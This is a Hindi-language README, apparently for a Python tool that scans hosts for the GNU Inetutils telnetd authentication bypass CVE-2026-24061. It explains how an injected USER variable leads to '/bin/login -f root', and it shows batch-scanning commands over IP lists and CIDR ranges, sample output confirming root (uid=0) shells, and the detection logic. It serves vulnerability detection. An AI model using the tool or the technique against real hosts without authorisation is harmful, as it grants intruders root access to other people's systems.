
GNU Inetutils telnet दूरस्थ प्रमाणीकरण बायपास भेद्यता (CVE-2026-24061), यह भेद्यता GNU Inetutils telnetd घटक में पर्यावरण चरों के अनुचित प्रबंधन के कारण उत्पन्न होती है। हमलावर इस भेद्यता का उपयोग करके, एक दुर्भावनापूर्ण USER पर्यावरण चर बनाकर उसे प्रभावित telnet सेवा पर भेज सकता है, जिससे प्रमाणीकरण बायपास तंत्र सक्रिय हो जाता है, और इस प्रकार बिना पासवर्ड के सीधे root विशेषाधिकार प्राप्त किए जा सकते हैं।
यह GNU Inetutils Telnetd प्रमाणीकरण बाईपास भेद्यता (CVE-2026-24061) का पता लगाने के लिए एक उन्नत पहचान उपकरण है। इस भेद्यता का CVSS स्कोर 9.8 है, और हमलावर पर्यावरण चर इंजेक्शन के माध्यम से बिना प्रमाणीकरण के root विशेषाधिकार प्राप्त कर सकते हैं।
# Windows सिस्टम रंग समर्थन
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# लक्ष्य फ़ाइल बनाएँ
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# बैच पहचान निष्पादित करें
python3 CVE-2026-24061.py -f targets.txt
# पोर्ट और थ्रेड संख्या निर्दिष्ट करें
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# विस्तृत मोड और परिणाम सहेजें
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# कस्टम टाइमआउट समय
python3 CVE-2026-24061.py -f targets.txt -T 10
| स्थिति | संकेतक | रंग | विवरण |
|---|---|---|---|
| भेद्यता की पुष्टि | ✓ | 🔴 लाल | uid=0 और gid=0 दोनों का पता चला |
| अत्यधिक संदिग्ध | ⚠ | 🟡 पीला | uid=0 और root उपयोगकर्ता का पता चला |
| पुष्टि आवश्यक | ? | 🔵 सियान | केवल uid=0 का पता चला, मैन्युअल सत्यापन आवश्यक |
| सुरक्षित | ✗ | 🟢 हरा | कोई भेद्यता विशेषता नहीं मिली |
| कनेक्शन विफल | ✗ | ⚪ ग्रे | नेटवर्क कनेक्शन समस्या |
[✓ भेद्यता की पुष्टि] [14:30:25] 192.168.1.1:23 └─ भेद्यता की पुष्टि | uid=0/gid=0 | बैनर: Ubuntu 20.04
[⚠ अत्यधिक संदिग्ध] [14:30:26] 192.168.1.2:23 └─ अत्यधिक संदिग्ध | uid=0 + root | बैनर: Debian 12
[? पुष्टि आवश्यक] [14:30:27] 192.168.1.3:23 └─ uid=0 का पता चला लेकिन अन्य पुष्टि शर्तें अनुपस्थित हैं
| पैरामीटर | संक्षिप्त | डिफ़ॉल्ट मान | विवरण |
|---|---|---|---|
--file | -f | - | लक्ष्य फ़ाइल पथ |
--port | -p | 23 | लक्ष्य पोर्ट |
--threads | -t | 50 | समवर्ती थ्रेड संख्या |
--timeout | -T | 8 | एकल लक्ष्य टाइमआउट (सेकंड) |
--output | -o | - | परिणाम आउटपुट फ़ाइल |
--verbose | -v | False | विस्तृत आउटपुट मोड |
--user | -u | root | प्रमाणीकरण उपयोगकर्ता नाम |
लक्ष्य फ़ाइल निम्नलिखित प्रारूपों का समर्थन करती है: 192.168.1.1 192.168.1.2:2323 # पोर्ट निर्दिष्ट करें 192.168.1.0/24 # CIDR प्रारूप 10.0.0.1-10.0.0.10 # IP सीमा
यह भेद्यता GNU Inetutils Telnetd द्वारा पर्यावरण चरों के अनुचित प्रबंधन का लाभ उठाती है:
/bin/login -f root कमांड निष्पादित करता है# बहु-स्तरीय पहचान शर्तें
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# भेद्यता पुष्टि तर्क
if uid_0_detected and gid_0_detected:
return "भेद्यता की पुष्टि"
elif uid_0_detected and root_detected:
return "अत्यधिक संदिग्ध"
elif uid_0_detected:
return "पुष्टि आवश्यक"
·


